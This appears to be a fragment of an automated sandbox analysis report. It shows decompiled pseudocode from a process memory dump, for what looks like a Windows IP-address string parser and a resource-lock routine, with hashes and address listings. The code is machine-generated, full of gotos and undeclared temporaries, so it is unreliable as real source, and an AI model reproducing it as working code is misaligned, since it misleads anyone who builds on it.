                                                                                                                                                  • API String ID: 3901378454-484625025
                                                                                                                                                  • Opcode ID: 6074a8e63d74d4826a33f2f664a208d766127a78920791e1fcde43a93bda7cec
                                                                                                                                                  • Instruction ID: 985f9b13762e34e94a31ebfd81fe99c62934da3e2ac286fb9a003977845bcd65
                                                                                                                                                  • Opcode Fuzzy Hash: 6074a8e63d74d4826a33f2f664a208d766127a78920791e1fcde43a93bda7cec
                                                                                                                                                  • Instruction Fuzzy Hash: EE41DD3164071DBAEB21AA54DCC9FEAF3BDFF58714F000599A505F7080EB70AA458FA9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E02570B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				signed int _v32;
                                                                                                                                                  				void* _t108;
                                                                                                                                                  				void* _t116;
                                                                                                                                                  				char _t120;
                                                                                                                                                  				short _t121;
                                                                                                                                                  				void* _t128;
                                                                                                                                                  				intOrPtr* _t130;
                                                                                                                                                  				char _t132;
                                                                                                                                                  				short _t133;
                                                                                                                                                  				intOrPtr _t141;
                                                                                                                                                  				signed int _t156;
                                                                                                                                                  				signed int _t174;
                                                                                                                                                  				intOrPtr _t177;
                                                                                                                                                  				intOrPtr* _t179;
                                                                                                                                                  				intOrPtr _t180;
                                                                                                                                                  				void* _t183;
                                                                                                                                                  
                                                                                                                                                  				_t179 = _a4;
                                                                                                                                                  				_t141 =  *_t179;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v28 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v32 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				if(_t141 == 0) {
                                                                                                                                                  					L41:
                                                                                                                                                  					 *_a8 = _t179;
                                                                                                                                                  					_t180 = _v24;
                                                                                                                                                  					if(_t180 != 0) {
                                                                                                                                                  						if(_t180 != 3) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                                  					}
                                                                                                                                                  					_t174 = _v32;
                                                                                                                                                  					if(_t174 == 0) {
                                                                                                                                                  						if(_v8 == 7) {
                                                                                                                                                  							goto L43;
                                                                                                                                                  						}
                                                                                                                                                  						goto L6;
                                                                                                                                                  					}
                                                                                                                                                  					L43:
                                                                                                                                                  					if(_v16 != 1) {
                                                                                                                                                  						if(_v16 != 2) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                  						L47:
                                                                                                                                                  						if(_t174 != 0) {
                                                                                                                                                  							E02548980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                  							_t116 = 8;
                                                                                                                                                  							E0253DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                  						}
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t180 != 0) {
                                                                                                                                                  						if(_v12 > 3) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						_t120 = E02570CFA(_v28, 0, 0xa);
                                                                                                                                                  						_t183 = _t183 + 0xc;
                                                                                                                                                  						if(_t120 > 0xff) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                  						goto L47;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v12 > 4) {
                                                                                                                                                  						goto L6;
                                                                                                                                                  					}
                                                                                                                                                  					_t121 = E02570CFA(_v28, _t180, 0x10);
                                                                                                                                                  					_t183 = _t183 + 0xc;
                                                                                                                                                  					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                  					goto L47;
                                                                                                                                                  				} else {
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t123 = _v16;
                                                                                                                                                  						if(_t123 == 0) {
                                                                                                                                                  							goto L7;
                                                                                                                                                  						}
                                                                                                                                                  						_t108 = _t123 - 1;
                                                                                                                                                  						if(_t108 != 0) {
                                                                                                                                                  							goto L1;
                                                                                                                                                  						}
                                                                                                                                                  						_t178 = _t141;
                                                                                                                                                  						if(E025706BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                  							if(E025706BA(_t135, _t178) == 0 || E02570A5B(_t136, _t178) == 0) {
                                                                                                                                                  								if(_t141 != 0x3a) {
                                                                                                                                                  									if(_t141 == 0x2e) {
                                                                                                                                                  										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                  											goto L41;
                                                                                                                                                  										} else {
                                                                                                                                                  											_v24 = _v24 + 1;
                                                                                                                                                  											L27:
                                                                                                                                                  											_v16 = _v16 & 0x00000000;
                                                                                                                                                  											L28:
                                                                                                                                                  											if(_v28 == 0) {
                                                                                                                                                  												goto L20;
                                                                                                                                                  											}
                                                                                                                                                  											_t177 = _v24;
                                                                                                                                                  											if(_t177 != 0) {
                                                                                                                                                  												if(_v12 > 3) {
                                                                                                                                                  													L6:
                                                                                                                                                  													return 0xc000000d;
                                                                                                                                                  												}
                                                                                                                                                  												_t132 = E02570CFA(_v28, 0, 0xa);
                                                                                                                                                  												_t183 = _t183 + 0xc;
                                                                                                                                                  												if(_t132 > 0xff) {
                                                                                                                                                  													goto L6;
                                                                                                                                                  												}
                                                                                                                                                  												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                  												goto L20;
                                                                                                                                                  											}
                                                                                                                                                  											if(_v12 > 4) {
                                                                                                                                                  												goto L6;
                                                                                                                                                  											}
                                                                                                                                                  											_t133 = E02570CFA(_v28, 0, 0x10);
                                                                                                                                                  											_t183 = _t183 + 0xc;
                                                                                                                                                  											_v20 = _v20 + 1;
                                                                                                                                                  											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                  											goto L20;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t130 = _t179 + 1;
                                                                                                                                                  									if( *_t130 == _t141) {
                                                                                                                                                  										if(_v32 != 0) {
                                                                                                                                                  											goto L41;
                                                                                                                                                  										}
                                                                                                                                                  										_v32 = _v8 + 1;
                                                                                                                                                  										_t156 = 2;
                                                                                                                                                  										_v8 = _v8 + _t156;
                                                                                                                                                  										L34:
                                                                                                                                                  										_t179 = _t130;
                                                                                                                                                  										_v16 = _t156;
                                                                                                                                                  										goto L28;
                                                                                                                                                  									}
                                                                                                                                                  									_v8 = _v8 + 1;
                                                                                                                                                  									goto L27;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_v12 = _v12 + 1;
                                                                                                                                                  								if(_v24 > 0) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								_a7 = 1;
                                                                                                                                                  								goto L20;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                                  							L20:
                                                                                                                                                  							_t179 = _t179 + 1;
                                                                                                                                                  							_t141 =  *_t179;
                                                                                                                                                  							if(_t141 == 0) {
                                                                                                                                                  								goto L41;
                                                                                                                                                  							}
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						L7:
                                                                                                                                                  						if(_t141 == 0x3a) {
                                                                                                                                                  							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                  								goto L41;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t130 = _t179 + 1;
                                                                                                                                                  								if( *_t130 != _t141) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								_v20 = _v20 + 1;
                                                                                                                                                  								_t156 = 2;
                                                                                                                                                  								_v32 = 1;
                                                                                                                                                  								_v8 = _t156;
                                                                                                                                                  								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                  								goto L34;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L8:
                                                                                                                                                  						if(_v8 > 7) {
                                                                                                                                                  							goto L41;
                                                                                                                                                  						}
                                                                                                                                                  						_t142 = _t141;
                                                                                                                                                  						if(E025706BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                  							if(E025706BA(_t124, _t142) == 0 || E02570A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                  								goto L41;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t128 = 1;
                                                                                                                                                  								_a7 = 1;
                                                                                                                                                  								_v28 = _t179;
                                                                                                                                                  								_v16 = 1;
                                                                                                                                                  								_v12 = 1;
                                                                                                                                                  								L39:
                                                                                                                                                  								if(_v16 == _t128) {
                                                                                                                                                  									goto L20;
                                                                                                                                                  								}
                                                                                                                                                  								goto L28;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							_a7 = 0;
                                                                                                                                                  							_v28 = _t179;
                                                                                                                                                  							_v16 = 1;
                                                                                                                                                  							_v12 = 1;
                                                                                                                                                  							goto L20;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L1:
                                                                                                                                                  				_t123 = _t108 == 1;
                                                                                                                                                  				if(_t108 == 1) {
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  				_t128 = 1;
                                                                                                                                                  				goto L39;
                                                                                                                                                  			}


























                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fassign
                                                                                                                                                  • String ID: .$:$:
                                                                                                                                                  • API String ID: 3965848254-2308638275
                                                                                                                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                  • Instruction ID: 6e6ed1e275cad24931eadb1fb1ea3ae463f76be601166c2c70217437377eedc6
                                                                                                                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                  • Instruction Fuzzy Hash: 08A19B7198020AEECF25DF64E8447BEBBF9BF45308F24846AD846A72C0D7349645CB59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                  			E02570554(signed int _a4, char _a8) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int* _t49;
                                                                                                                                                  				signed int _t51;
                                                                                                                                                  				signed int _t56;
                                                                                                                                                  				signed int _t58;
                                                                                                                                                  				signed int _t61;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				signed int _t70;
                                                                                                                                                  				void* _t75;
                                                                                                                                                  				signed int _t81;
                                                                                                                                                  				signed int _t84;
                                                                                                                                                  				void* _t86;
                                                                                                                                                  				signed int _t93;
                                                                                                                                                  				signed int _t96;
                                                                                                                                                  				intOrPtr _t105;
                                                                                                                                                  				signed int _t107;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				signed int _t115;
                                                                                                                                                  				signed int* _t119;
                                                                                                                                                  				void* _t125;
                                                                                                                                                  				void* _t126;
                                                                                                                                                  				signed int _t128;
                                                                                                                                                  				signed int _t130;
                                                                                                                                                  				signed int _t138;
                                                                                                                                                  				signed int _t144;
                                                                                                                                                  				void* _t158;
                                                                                                                                                  				void* _t159;
                                                                                                                                                  				void* _t160;
                                                                                                                                                  
                                                                                                                                                  				_t96 = _a4;
                                                                                                                                                  				_t115 =  *(_t96 + 0x28);
                                                                                                                                                  				_push(_t138);
                                                                                                                                                  				if(_t115 < 0) {
                                                                                                                                                  					_t105 =  *[fs:0x18];
                                                                                                                                                  					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                  						goto L6;
                                                                                                                                                  					} else {
                                                                                                                                                  						__eflags = _t115 | 0xffffffff;
                                                                                                                                                  						asm("lock xadd [eax], edx");
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					L6:
                                                                                                                                                  					_push(_t128);
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L7:
                                                                                                                                                  						__eflags = _t115;
                                                                                                                                                  						if(_t115 >= 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _a8;
                                                                                                                                                  						if(_a8 == 0) {
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							return 0;
                                                                                                                                                  						} else {
                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                  							_t49 = _t96 + 0x1c;
                                                                                                                                                  							_t106 = 1;
                                                                                                                                                  							asm("lock xadd [edx], ecx");
                                                                                                                                                  							_t115 =  *(_t96 + 0x28);
                                                                                                                                                  							__eflags = _t115;
                                                                                                                                                  							if(_t115 < 0) {
                                                                                                                                                  								L23:
                                                                                                                                                  								_t130 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                  									asm("sbb esi, esi");
                                                                                                                                                  									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026101c0;
                                                                                                                                                  									_push(_t144);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_t51 = E0252F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                  									__eflags = _t51 - 0x102;
                                                                                                                                                  									if(_t51 != 0x102) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t106 =  *(_t144 + 4);
                                                                                                                                                  									_t126 =  *_t144;
                                                                                                                                                  									_t86 = E02574FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                  									_push(_t126);
                                                                                                                                                  									_push(_t86);
                                                                                                                                                  									E02583F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                  									E02583F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                  									_t130 = _t130 + 1;
                                                                                                                                                  									_t160 = _t158 + 0x28;
                                                                                                                                                  									__eflags = _t130 - 2;
                                                                                                                                                  									if(__eflags > 0) {
                                                                                                                                                  										E025B217A(_t106, __eflags, _t96);
                                                                                                                                                  									}
                                                                                                                                                  									_push("RTL: Re-Waiting\n");
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_push(0x65);
                                                                                                                                                  									E02583F92();
                                                                                                                                                  									_t158 = _t160 + 0xc;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t51;
                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                  									_push(_t51);
                                                                                                                                                  									E02573915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                  									asm("int3");
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L32:
                                                                                                                                                  										__eflags = _a8;
                                                                                                                                                  										if(_a8 == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                  										_t119 = _t96 + 0x24;
                                                                                                                                                  										_t107 = 1;
                                                                                                                                                  										asm("lock xadd [eax], ecx");
                                                                                                                                                  										_t56 =  *(_t96 + 0x28);
                                                                                                                                                  										_a4 = _t56;
                                                                                                                                                  										__eflags = _t56;
                                                                                                                                                  										if(_t56 != 0) {
                                                                                                                                                  											L40:
                                                                                                                                                  											_t128 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											while(1) {
                                                                                                                                                  												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                  												asm("sbb esi, esi");
                                                                                                                                                  												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026101c0;
                                                                                                                                                  												_push(_t138);
                                                                                                                                                  												_push(0);
                                                                                                                                                  												_t58 = E0252F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                  												__eflags = _t58 - 0x102;
                                                                                                                                                  												if(_t58 != 0x102) {
                                                                                                                                                  													break;
                                                                                                                                                  												}
                                                                                                                                                  												_t107 =  *(_t138 + 4);
                                                                                                                                                  												_t125 =  *_t138;
                                                                                                                                                  												_t75 = E02574FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                  												_push(_t125);
                                                                                                                                                  												_push(_t75);
                                                                                                                                                  												E02583F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                  												E02583F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                  												_t128 = _t128 + 1;
                                                                                                                                                  												_t159 = _t158 + 0x28;
                                                                                                                                                  												__eflags = _t128 - 2;
                                                                                                                                                  												if(__eflags > 0) {
                                                                                                                                                  													E025B217A(_t107, __eflags, _t96);
                                                                                                                                                  												}
                                                                                                                                                  												_push("RTL: Re-Waiting\n");
                                                                                                                                                  												_push(0);
                                                                                                                                                  												_push(0x65);
                                                                                                                                                  												E02583F92();
                                                                                                                                                  												_t158 = _t159 + 0xc;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = _t58;
                                                                                                                                                  											if(__eflags < 0) {
                                                                                                                                                  												_push(_t58);
                                                                                                                                                  												E02573915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                  												asm("int3");
                                                                                                                                                  												_t61 =  *_t107;
                                                                                                                                                  												 *_t107 = 0;
                                                                                                                                                  												__eflags = _t61;
                                                                                                                                                  												if(_t61 == 0) {
                                                                                                                                                  													L1:
                                                                                                                                                  													_t63 = E02555384(_t138 + 0x24);
                                                                                                                                                  													if(_t63 != 0) {
                                                                                                                                                  														goto L52;
                                                                                                                                                  													} else {
                                                                                                                                                  														goto L2;
                                                                                                                                                  													}
                                                                                                                                                  												} else {
                                                                                                                                                  													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                  													_push( &_a4);
                                                                                                                                                  													_push(_t61);
                                                                                                                                                  													_t70 = E0252F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                  													__eflags = _t70;
                                                                                                                                                  													if(__eflags >= 0) {
                                                                                                                                                  														goto L1;
                                                                                                                                                  													} else {
                                                                                                                                                  														_push(_t70);
                                                                                                                                                  														E02573915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                  														L52:
                                                                                                                                                  														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                  														_push( &_a4);
                                                                                                                                                  														_push(1);
                                                                                                                                                  														_t63 = E0252F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                  														__eflags = _t63;
                                                                                                                                                  														if(__eflags >= 0) {
                                                                                                                                                  															L2:
                                                                                                                                                  															return _t63;
                                                                                                                                                  														} else {
                                                                                                                                                  															_push(_t63);
                                                                                                                                                  															E02573915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                  															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                  															_push( &_a4);
                                                                                                                                                  															_push(1);
                                                                                                                                                  															_t63 = E0252F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                  															__eflags = _t63;
                                                                                                                                                  															if(__eflags >= 0) {
                                                                                                                                                  																goto L2;
                                                                                                                                                  															} else {
                                                                                                                                                  																_push(_t63);
                                                                                                                                                  																_t66 = E02573915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                  																asm("int3");
                                                                                                                                                  																while(1) {
                                                                                                                                                  																	_t110 = _t66;
                                                                                                                                                  																	__eflags = _t66 - 1;
                                                                                                                                                  																	if(_t66 != 1) {
                                                                                                                                                  																		break;
                                                                                                                                                  																	}
                                                                                                                                                  																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                  																	_t66 = _t110;
                                                                                                                                                  																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                  																	__eflags = _t66 - _t110;
                                                                                                                                                  																	if(_t66 != _t110) {
                                                                                                                                                  																		continue;
                                                                                                                                                  																	} else {
                                                                                                                                                  																		_t67 =  *[fs:0x18];
                                                                                                                                                  																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                  																		return _t67;
                                                                                                                                                  																	}
                                                                                                                                                  																	goto L59;
                                                                                                                                                  																}
                                                                                                                                                  																E02555329(_t110, _t138);
                                                                                                                                                  																_t69 = E025553A5(_t138, 1);
                                                                                                                                                  																return _t69;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											} else {
                                                                                                                                                  												_t56 =  *(_t96 + 0x28);
                                                                                                                                                  												goto L3;
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_t107 =  *_t119;
                                                                                                                                                  											__eflags = _t107;
                                                                                                                                                  											if(__eflags > 0) {
                                                                                                                                                  												while(1) {
                                                                                                                                                  													_t81 = _t107;
                                                                                                                                                  													asm("lock cmpxchg [edi], esi");
                                                                                                                                                  													__eflags = _t81 - _t107;
                                                                                                                                                  													if(_t81 == _t107) {
                                                                                                                                                  														break;
                                                                                                                                                  													}
                                                                                                                                                  													_t107 = _t81;
                                                                                                                                                  													__eflags = _t81;
                                                                                                                                                  													if(_t81 > 0) {
                                                                                                                                                  														continue;
                                                                                                                                                  													}
                                                                                                                                                  													break;
                                                                                                                                                  												}
                                                                                                                                                  												_t56 = _a4;
                                                                                                                                                  												__eflags = _t107;
                                                                                                                                                  											}
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												while(1) {
                                                                                                                                                  													L3:
                                                                                                                                                  													__eflags = _t56;
                                                                                                                                                  													if(_t56 != 0) {
                                                                                                                                                  														goto L32;
                                                                                                                                                  													}
                                                                                                                                                  													_t107 = _t107 | 0xffffffff;
                                                                                                                                                  													_t56 = 0;
                                                                                                                                                  													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                  													__eflags = 0;
                                                                                                                                                  													if(0 != 0) {
                                                                                                                                                  														continue;
                                                                                                                                                  													} else {
                                                                                                                                                  														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                  														return 1;
                                                                                                                                                  													}
                                                                                                                                                  													goto L59;
                                                                                                                                                  												}
                                                                                                                                                  												continue;
                                                                                                                                                  											} else {
                                                                                                                                                  												goto L40;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										goto L59;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									return 0;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t115 =  *(_t96 + 0x28);
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_t106 =  *_t49;
                                                                                                                                                  								__eflags = _t106;
                                                                                                                                                  								if(__eflags > 0) {
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t93 = _t106;
                                                                                                                                                  										asm("lock cmpxchg [edi], esi");
                                                                                                                                                  										__eflags = _t93 - _t106;
                                                                                                                                                  										if(_t93 == _t106) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										_t106 = _t93;
                                                                                                                                                  										__eflags = _t93;
                                                                                                                                                  										if(_t93 > 0) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t106;
                                                                                                                                                  								}
                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                  									continue;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L23;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						goto L59;
                                                                                                                                                  					}
                                                                                                                                                  					_t84 = _t115;
                                                                                                                                                  					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                  					__eflags = _t84 - _t115;
                                                                                                                                                  					if(_t84 != _t115) {
                                                                                                                                                  						_t115 = _t84;
                                                                                                                                                  						goto L7;
                                                                                                                                                  					} else {
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L59:
                                                                                                                                                  			}




































                                                                                                                                                  0x025921f1
                                                                                                                                                  0x025921f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025921f8
                                                                                                                                                  0x025921fb
                                                                                                                                                  0x02592206
                                                                                                                                                  0x0259220b
                                                                                                                                                  0x0259220c
                                                                                                                                                  0x02592217
                                                                                                                                                  0x02592226
                                                                                                                                                  0x0259222b
                                                                                                                                                  0x0259222c
                                                                                                                                                  0x0259222f
                                                                                                                                                  0x02592232
                                                                                                                                                  0x02592235
                                                                                                                                                  0x02592235
                                                                                                                                                  0x0259223a
                                                                                                                                                  0x0259223f
                                                                                                                                                  0x02592241
                                                                                                                                                  0x02592243
                                                                                                                                                  0x02592248
                                                                                                                                                  0x02592248
                                                                                                                                                  0x0259224d
                                                                                                                                                  0x0259224f
                                                                                                                                                  0x02592262
                                                                                                                                                  0x02592263
                                                                                                                                                  0x02592268
                                                                                                                                                  0x02592269
                                                                                                                                                  0x02592269
                                                                                                                                                  0x02592269
                                                                                                                                                  0x0259226d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592276
                                                                                                                                                  0x02592279
                                                                                                                                                  0x0259227e
                                                                                                                                                  0x02592283
                                                                                                                                                  0x02592287
                                                                                                                                                  0x0259228a
                                                                                                                                                  0x0259228d
                                                                                                                                                  0x0259228f
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922be
                                                                                                                                                  0x025922c4
                                                                                                                                                  0x025922cc
                                                                                                                                                  0x025922d0
                                                                                                                                                  0x025922d6
                                                                                                                                                  0x025922d7
                                                                                                                                                  0x025922da
                                                                                                                                                  0x025922df
                                                                                                                                                  0x025922e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922e6
                                                                                                                                                  0x025922e9
                                                                                                                                                  0x025922f4
                                                                                                                                                  0x025922f9
                                                                                                                                                  0x025922fa
                                                                                                                                                  0x02592305
                                                                                                                                                  0x02592314
                                                                                                                                                  0x02592319
                                                                                                                                                  0x0259231a
                                                                                                                                                  0x0259231d
                                                                                                                                                  0x02592320
                                                                                                                                                  0x02592323
                                                                                                                                                  0x02592323
                                                                                                                                                  0x02592328
                                                                                                                                                  0x0259232d
                                                                                                                                                  0x0259232f
                                                                                                                                                  0x02592331
                                                                                                                                                  0x02592336
                                                                                                                                                  0x02592336
                                                                                                                                                  0x0259233b
                                                                                                                                                  0x0259233d
                                                                                                                                                  0x02592350
                                                                                                                                                  0x02592351
                                                                                                                                                  0x02592356
                                                                                                                                                  0x02592359
                                                                                                                                                  0x02592359
                                                                                                                                                  0x0259235b
                                                                                                                                                  0x0259235d
                                                                                                                                                  0x02555367
                                                                                                                                                  0x0255536b
                                                                                                                                                  0x02555372
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592363
                                                                                                                                                  0x02592363
                                                                                                                                                  0x02592369
                                                                                                                                                  0x0259236a
                                                                                                                                                  0x0259236c
                                                                                                                                                  0x02592371
                                                                                                                                                  0x02592373
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592379
                                                                                                                                                  0x02592379
                                                                                                                                                  0x0259237a
                                                                                                                                                  0x0259237f
                                                                                                                                                  0x0259237f
                                                                                                                                                  0x02592385
                                                                                                                                                  0x02592386
                                                                                                                                                  0x02592389
